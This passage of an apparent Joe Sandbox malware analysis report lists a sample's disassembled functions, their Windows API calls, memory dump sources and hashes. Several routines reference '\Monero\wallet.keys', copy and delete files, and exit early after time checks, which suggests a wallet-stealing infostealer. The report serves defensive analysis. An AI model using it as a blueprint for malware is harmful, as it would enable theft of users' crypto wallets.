                                • Opcode ID: d3375014cea43031a6a3a87897a9678b8c1df895fe7befa7a3ca58a51ef58d7c
                                • Instruction ID: dac61c762a10f662f30bb75d85a85e7b642fee66d3aefb9462b478e76c72e44f
                                • Opcode Fuzzy Hash: d3375014cea43031a6a3a87897a9678b8c1df895fe7befa7a3ca58a51ef58d7c
                                • Instruction Fuzzy Hash: D9615E75A50208AFDB28EFA4CC96FED7775BF44304F048118F90A9F192EB706A45DB52
                                Function 00C46920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 00C4696C
                                • sscanf.NTDLL ref: 00C46999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C469B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C469C0
                                • ExitProcess.KERNEL32 ref: 00C469DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: 03a5d5951847db2f18000d8578f1f804dccc2f651e29417838c0f2ac6fdc649f
                                • Instruction ID: bbdb9b450b98a056d6c840cc88b7d4dc4e9053ac0e906248e22c998ff1303f63
                                • Opcode Fuzzy Hash: 03a5d5951847db2f18000d8578f1f804dccc2f651e29417838c0f2ac6fdc649f
                                • Instruction Fuzzy Hash: 7021EA75D04208AFDF08EFE4E9499EEB7B5BF48300F04852AE41AB3250EB345609CB66
                                Function 00C47E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C47E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,019EB9F0,00000000,00020119,?), ref: 00C47E5E
                                • RegQueryValueExA.ADVAPI32(?,019FDF60,00000000,00000000,000000FF,000000FF), ref: 00C47E7F
                                • RegCloseKey.ADVAPI32(?), ref: 00C47E92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 2408f0725655bf02c29892ffddbea53502a67b5de796209c8c4a5bbb4a8cada5
                                • Instruction ID: 074f3c998993c1ee3f773f4b9f474fcc115dd2070a7941626f9b3756b8b8773b
                                • Opcode Fuzzy Hash: 2408f0725655bf02c29892ffddbea53502a67b5de796209c8c4a5bbb4a8cada5
                                • Instruction Fuzzy Hash: 12119EB1A44205EFD714CF96DC49FBFBBB8FB44B11F104269FA19A7280D77458448BA2
                                Function 00C49260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                Download Yara Rule
                                APIs
                                • StrStrA.SHLWAPI(019FEAF0,?,?,?,00C4140C,?,019FEAF0,00000000), ref: 00C4926C
                                • lstrcpyn.KERNEL32(00E7AB88,019FEAF0,019FEAF0,?,00C4140C,?,019FEAF0), ref: 00C49290
                                • lstrlen.KERNEL32(?,?,00C4140C,?,019FEAF0), ref: 00C492A7
                                • wsprintfA.USER32 ref: 00C492C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: 65f9723c1dfb9f69dffc7af861c15161e24a4550ec677cd9733b19d9f5f3e885
                                • Instruction ID: 28876ff8b42362dc6559dcc23428857f4689c530d048d04c378d6f7cb0d45bdf
                                • Opcode Fuzzy Hash: 65f9723c1dfb9f69dffc7af861c15161e24a4550ec677cd9733b19d9f5f3e885
                                • Instruction Fuzzy Hash: CA01E975500108FFCB04DFE8C989EAE7BB9EB84351F148158F909AB200C671AA84DB91
                                Function 00C312A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C312B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C312BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C312D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C312F5
                                • RegCloseKey.ADVAPI32(?), ref: 00C312FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 547e4fbe46c81b838e4184819c29e58d3e41b5bb5e31121aef6162c703d37545
                                • Instruction ID: cc50ff314bea2a6fcedc98e33b51c9ca0b1af74312210505acee6038ffae1396
                                • Opcode Fuzzy Hash: 547e4fbe46c81b838e4184819c29e58d3e41b5bb5e31121aef6162c703d37545
                                • Instruction Fuzzy Hash: 570149B5A40208BFDB04DFD1DC49FAEB7BCEB88701F048155FA09E7280D6719A458F51
                                Function 00C46630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00C46663
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00C46726
                                • ExitProcess.KERNEL32 ref: 00C46755
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: 15667b520a7b59246857345257d210bd1953ee04d44ce0e79db77209ce1c0f25
                                • Instruction ID: e696c0407e519717f425ceaa921f1f18a762fc3e7d01dffd573a767634519459
                                • Opcode Fuzzy Hash: 15667b520a7b59246857345257d210bd1953ee04d44ce0e79db77209ce1c0f25
                                • Instruction Fuzzy Hash: 043129B1801218AEEB14EBA0DC96BDEB778BF54300F404199F20976191DF746B89DF6A
                                Function 00C487C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C50E28,00000000,?), ref: 00C4882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C48836
                                • wsprintfA.USER32 ref: 00C48850
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 2523d72af5aa42835b935578563581522d0d130ce7e61e38a9ca00defc0aabf2
                                • Instruction ID: 1af1bd7091b57e298001ce37945bf9e690a004dc15e5fa3eea4bb93ad845d9d2
                                • Opcode Fuzzy Hash: 2523d72af5aa42835b935578563581522d0d130ce7e61e38a9ca00defc0aabf2
                                • Instruction Fuzzy Hash: C52130B1A40204AFDB04DFD5DD49FAEBBB8FB48701F144169F609B7280C77999448BA2
                                Function 00C48D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00C4951E,00000000), ref: 00C48D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C48D62
                                • wsprintfW.USER32 ref: 00C48D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: 0369ca3acb2b4c2845fa90cff2909a0d1ca3424edbead2772259e0ebbef62215
                                • Instruction ID: 095d7da9c801bd7be6e0732987677f78e7540a6bbb865775ddad10362dfefdbe
                                • Opcode Fuzzy Hash: 0369ca3acb2b4c2845fa90cff2909a0d1ca3424edbead2772259e0ebbef62215
                                • Instruction Fuzzy Hash: CDE08CB4A40208BFD704DB95DC0EE6D77BCEB84702F0800A4FD0DA7280DA719E489BA6
                                Function 00C3A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C48B60: GetSystemTime.KERNEL32(00C50E1A,019FE738,00C505AE,?,?,00C313F9,?,0000001A,00C50E1A,00000000,?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C48B86
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C3A2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 00C3A3FF
                                • lstrlen.KERNEL32(00000000), ref: 00C3A6BC
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 00C3A743
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: d6b7584c5af3f2619a6c79c59b32abe5a6e98dcf547b751af9e9b0f22b85e5ad
                                • Instruction ID: b86c1a46df95812064394d63fd708a5952333ebb78e9584a6ebe85c475cc6ae3
                                • Opcode Fuzzy Hash: d6b7584c5af3f2619a6c79c59b32abe5a6e98dcf547b751af9e9b0f22b85e5ad
                                • Instruction Fuzzy Hash: 93E1EE72850108ABEB14FBA4DC96EEE7338FF54300F548169F516B2091EF306A4DEB66
                                Function 00C3D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C48B60: GetSystemTime.KERNEL32(00C50E1A,019FE738,00C505AE,?,?,00C313F9,?,0000001A,00C50E1A,00000000,?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C48B86
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C3D481
                                • lstrlen.KERNEL32(00000000), ref: 00C3D698
                                • lstrlen.KERNEL32(00000000), ref: 00C3D6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 00C3D72B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 46a440ef283b77768bfd31f00eb3311d55b85adf028c13aa51d6d5f58d19c737
                                • Instruction ID: a38e6b5555c82d73054e6f91391e463e3e123c6ca4d1d4f5fff4c61b2c1961ce
                                • Opcode Fuzzy Hash: 46a440ef283b77768bfd31f00eb3311d55b85adf028c13aa51d6d5f58d19c737
                                • Instruction Fuzzy Hash: 3A912D72850108ABEB04FBA0DC96EEE7338FF54304F544569F517B6092EF346A49EB62
                                Function 00C3D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C48B60: GetSystemTime.KERNEL32(00C50E1A,019FE738,00C505AE,?,?,00C313F9,?,0000001A,00C50E1A,00000000,?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C48B86
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C3D801
                                • lstrlen.KERNEL32(00000000), ref: 00C3D99F
                                • lstrlen.KERNEL32(00000000), ref: 00C3D9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 00C3DA32
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
